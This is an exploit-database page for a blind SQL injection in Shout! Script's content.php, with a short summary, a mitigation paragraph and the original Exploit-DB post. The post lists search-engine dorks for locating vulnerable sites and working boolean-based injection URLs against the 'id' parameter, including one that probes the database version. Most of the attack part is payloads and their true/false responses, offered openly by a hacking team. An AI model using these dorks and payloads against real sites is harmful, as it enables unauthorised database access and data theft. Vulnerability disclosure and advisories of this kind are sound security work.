header-logo
Suggest Exploit
vendor:
Shout! Script
by:
Zero Cold
5.5
CVSS
MEDIUM
Blind Sql Injection
89
CWE
Product Name: Shout! Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Shout! (content.php) Blind Sql Injection Vulnerability

This vulnerability allows an attacker to perform Blind Sql Injection on the Shout! Script. By modifying the 'id' parameter in the content.php URL, the attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The exploit examples provided demonstrate how to determine the version of the database server by leveraging the boolean-based blind SQL injection technique.

Mitigation:

To mitigate this vulnerability, the vendor should implement proper input validation and parameterization techniques to prevent SQL injection attacks. Users are advised to update to the latest version of the Shout! Script.
Source

Exploit-DB raw data:

Shout! (content.php) Blind Sql Injection Vulnerability
=======================================================

####################################################################
.:. Author         : Zero Cold [zero-cold@msn.com]

.:. Team           : Sec Attack Team

.:. Home           : www.sec-attack.com/vb

.:. Script         : Shout! Script

.:. Vendor         : http://www.mediashaker.com/index.php

.:. Bug Type       : Blind Sql Injection

.:. Dork           : [1] "Powered by Shout!"
                     [2] intitle:"Shout" inurl:"admindex.php"

####################################################################

===[ Exploit ]===

www.site.com/content.php?id=54+and+1=1       >>> True
www.site.com/content.php?id=54+and+1=2       >>> False


www.site.com/content.php?id=54+and substring(@@version,1,1)=4  >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5  >>> False



####################################################################

Greats T0: HackxBack & AtT4CKxT3rR0r1ST & SAD All My Friend & All Member Sec Attack